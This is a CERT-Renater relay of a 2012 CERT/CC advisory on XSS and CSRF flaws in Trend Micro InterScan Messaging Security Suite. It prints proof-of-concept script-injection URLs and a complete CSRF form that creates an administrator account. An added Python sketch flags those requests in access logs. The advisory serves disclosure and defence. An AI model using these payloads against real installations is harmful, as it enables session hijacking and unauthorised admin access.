
====================================================================

                             CERT-Renater

                  Information Note No. 2012/VULN362
____________________________________________________________________

DATE                : 14/09/2012

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S) : Systems running Trend Micro InterScan Messaging
                           Security Suite.

======================================================================
http://www.kb.cert.org/vuls/id/471364
______________________________________________________________________

Vulnerability Note VU#471364

Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and
CSRF vulnerabilities


Original Release date: 13 Sep 2012 | Last revised: 13 Sep 2012


Overview

Trend Micro InterScan Messaging Security Suite is susceptible to
cross-site scripting and cross-site request forgery vulnerabilities.


Description

Trend Micro InterScan Messaging Security Suite is susceptible to
cross-site scripting (CWE-79) and cross-site request forgery (CWE-352)
vulnerabilities.

Cross-site scripting (CVE-2012-2995) (CWE-79)

Persistent/Stored XSS:
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>

Non-persistent/Reflected XSS:
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>

Cross-site request forgery (CVE-2012-2996) (CWE-352)

CSRF add admin privilege account:
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra&#46;123" />
<input type="hidden" name="confirmPwd" value="quorra&#46;123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>


Impact

An unauthenticated attacker may be able to execute arbitrary script in
the context of a logged-in user's session.


Solution

We are currently unaware of a practical solution to this problem. Please
consider the following workarounds.

Restrict access

As a general good security practice, only allow connections from
trusted hosts and networks. Restricting access would prevent an
attacker from accessing the InterScan Messaging Security Suite using
stolen credentials from a blocked network location.
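
The following Python sketch is an added detection example, not part of the CERT/CC note or of the product: it checks web access log lines for the request patterns listed in the Description (markup characters in the `wrsApprovedURL` and `src` parameters, and POSTs to `saveAccountSubTab.imss` whose Referer is not the management console). The Apache "combined" log layout, the host name `imss.example.internal` and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints and parameters named in the advisory's Description section.
XSS_PARAMS = {
    "/addRuleAttrWrsApproveUrl.imss": "wrsApprovedURL",
    "/initUpdSchPage.imss": "src",
}
CSRF_ENDPOINT = "/saveAccountSubTab.imss"
MARKUP = re.compile(r"[<>\"']")  # characters able to break out of an HTML attribute

# Assumption: NCSA/Apache "combined" format (request line, status, size, Referer).
LINE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"')

def classify(line, console_hosts):
    """Return 'xss', 'csrf' or None for one access-log line."""
    m = LINE.search(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    param = XSS_PARAMS.get(url.path)
    if param:
        # parse_qsl percent-decodes values, so encoded markup is caught too.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == param and MARKUP.search(value):
                return "xss"
    if m["method"] == "POST" and url.path == CSRF_ENDPOINT:
        # An account-saving POST with a missing or off-console Referer is suspect.
        if urlsplit(m["referer"]).hostname not in console_hosts:
            return "csrf"
    return None

# Constructed sample log lines (not taken from a real system).
SAMPLE = [
    '10.0.0.5 - - [14/Sep/2012:10:00:00 +0200] "GET /initUpdSchPage.imss'
    '?src=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512 "-" "UA"',
    '10.0.0.5 - - [14/Sep/2012:10:01:00 +0200] "POST /saveAccountSubTab.imss'
    ' HTTP/1.1" 200 128 "http://other.example/page.html" "UA"',
    '10.0.0.5 - - [14/Sep/2012:10:02:00 +0200] "POST /saveAccountSubTab.imss'
    ' HTTP/1.1" 200 128 "https://imss.example.internal:8445/" "UA"',
    '10.0.0.5 - - [14/Sep/2012:10:03:00 +0200] "GET /initUpdSchPage.imss'
    '?src=schedule HTTP/1.1" 200 512 "-" "UA"',
]

def scan(lines, console_hosts):
    """Return (line_number, verdict) for every flagged line."""
    hits = ((i, classify(l, console_hosts)) for i, l in enumerate(lines, 1))
    return [(i, v) for i, v in hits if v]
```

Access logs record only the query string, so a payload submitted in a POST body is not visible to this check and needs proxy or application-level logging.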


Vendor Information

Vendor         Status      Date Notified   Date Updated
Trend Micro    Affected    10 Aug 2012     12 Sep 2012


CVSS Metrics

Group           Score   Vector
Base            6.8     AV:N/AC:M/Au:N/C:P/I:P/A:P
Temporal        5.5     E:POC/RL:U/RC:UC
Environmental   5.5     CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND


References

    http://cwe.mitre.org/data/definitions/352.html
    http://cwe.mitre.org/data/definitions/79.html

    http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html


Credit

Thanks to Tom Gregory for reporting this vulnerability.

This document was written by Jared Allar.


Other Information

    CVE IDs: CVE-2012-2995 CVE-2012-2996
    Date Public: 13 Sep 2012
    Date First Published: 13 Sep 2012
    Date Last Updated: 13 Sep 2012
    Document Revision: 11


======================================================================

=========================================================
CERT-Renater reference server
https://services.renater.fr/ssi/
=========================================================
+ CERT-RENATER          | tel : 01-53-94-20-44          +
+ 23 - 25 Rue Daviel    | fax : 01-53-94-20-41          +
+ 75013 Paris           | email: certsvp@renater.fr     +
=========================================================
